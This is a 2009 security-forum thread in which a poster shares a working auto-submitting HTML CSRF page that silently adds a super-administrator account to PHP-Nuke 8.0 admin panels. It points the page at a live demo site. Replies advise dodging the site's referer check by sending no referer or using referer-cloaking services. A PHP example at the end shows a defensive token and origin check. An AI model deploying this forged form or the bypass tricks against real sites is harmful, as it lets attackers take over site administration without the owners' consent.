Sla.ckers.org
Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: XaDoS
Date: September 16, 2009 09:44AM

Hey guys!
Some weeks ago I tried to code an HTML page for PHP-Nuke v8.0 because I saw that it is vulnerable to a CSRF attack.
I see that a malicious person can add an admin user to a board with administrator privileges.
I have only one problem, which I wrote about in my last topic here: HTTP_referrer..
The site, when I try to add an admin user, responds:
your browser doesn't send the HTTP_referrer header.
send it and later you can execute all POST requests.

I tried with a tool for creating/editing the HTTP referrer but it's not useful, because the "victim" admin of a site, when he clicks on my fake HTML page with the CSRF, doesn't have a tool to change or edit the referrer.. so I stopped this line of argument. If anybody can help me or has some idea, contact me or post here immediately!
thanks in advance.

CSRF code:
<html>
<head>
<title>PHP-Nuke 8.0 (final version) <= CSRF vuln (add admin user)</title>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body>
<form name="xados" action="[VICTIM_SITE]" method="post">
<input type="text" name="add_name" size="30" maxlength="50" value="[NICKNAME]" />
<input type="text" name="add_aid" size="30" maxlength="25" value="[NAME]" />
<input type="text" name="add_email" size="30" maxlength="60" value="" />
<input type="checkbox" name="add_radminsuper" value="1"/>
<input type="password" name="add_pwd" size="12" maxlength="40" value="[PASSWORD]" />
<input type="hidden" name="op" value="AddAuthor" />
<input type="submit" value="Add Author" />
</form>
<script>document.xados.submit()</script>
</body>
</html>

To try it, write in VICTIM_SITE:
http://demo.opensourcecms.com/phpnuke/admin.php?op=mod_authors

Naturally you must be logged in as an admin user and then click on my CSRF page.

Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: rvdh
Date: September 17, 2009 02:02AM

Ugh PHP-Nuke, that piece of crappy software never was secure, I'm amazed that it's still alive. It should be NUKED! ;-)

Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: clayfox
Date: September 17, 2009 08:49AM

It might be easier to send No referer instead of a spoofed referer. Often referer checks are bypassed by sending no referers.

-clayfox

Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: XaDoS
Date: September 17, 2009 12:43PM

OK, but how can I send the referrer through an HTML (with CSRF code) page?

Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: Zer0x00
Date: September 18, 2009 12:21PM

Yes, I'm interested too :/

Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: PaPPy
Date: September 19, 2009 05:32AM

http://referer.us/hide-http-referer.html
http://en.wikipedia.org/wiki/Referrer_spoofing
are interesting

I remember coming across a javascript from one of these sites you could place into your code and any links off it (including post) would be rewritten to have no Referrer info

found it http://cloakedlink.com/
click more options

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 09/19/2009 05:34AM by PaPPy.

Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: XaDoS
Date: September 20, 2009 01:42PM

Thanks so much PaPPy,
I tried with http://cloakedlink.com/ and it works fine: the site doesn't show me the message about the referrer problem.. but the CSRF doesn't work :(
I don't understand what the problem is.. but I'll keep trying in the next days.

Re: PHP-Nuke 8.0 final <= CSRF vuln (add admin user)
Posted by: PaPPy
Date: September 20, 2009 11:40PM

look thru the code of php-nuke and see if they generate any session vars that are needed on the next page or something

http://www.xssed.com/archive/author=PaPPy/
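
A server-side check covering the two defensive points raised in this thread (a request that carries no Referer must not pass, and a per-session value should be required on the follow-up request), as an added example that is not part of any post and is not PHP-Nuke's own code. The function names, the csrf_token field and the host nuke.example are assumptions.

```php
<?php
// Added example, not PHP-Nuke code. Names such as csrf_token and
// admin_request_is_trusted() are hypothetical.

// Issue one unpredictable token per session and embed it in every admin form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Same-origin test on Origin, falling back to Referer. A missing header
// is treated as a failure, so an absent Referer does not pass the check.
function same_origin(array $server, string $expectedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Gate for state-changing admin operations such as op=AddAuthor.
function admin_request_is_trusted(array $server, array $post, array $session, string $expectedHost): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    if (!same_origin($server, $expectedHost)) {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    // hash_equals() compares in constant time; both sides must be non-empty strings.
    return is_string($sent) && $known !== '' && hash_equals($known, $sent);
}

// Constructed sample requests (not captured traffic).
$session = [];
$token = csrf_token($session);
$forged = ['REQUEST_METHOD' => 'POST'];  // cross-site form, no Referer header
$legit = ['REQUEST_METHOD' => 'POST', 'HTTP_REFERER' => 'https://nuke.example/admin.php'];
var_dump(admin_request_is_trusted($forged, ['op' => 'AddAuthor'], $session, 'nuke.example'));
var_dump(admin_request_is_trusted($legit, ['op' => 'AddAuthor'], $session, 'nuke.example'));
var_dump(admin_request_is_trusted($legit, ['op' => 'AddAuthor', 'csrf_token' => $token], $session, 'nuke.example'));
```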
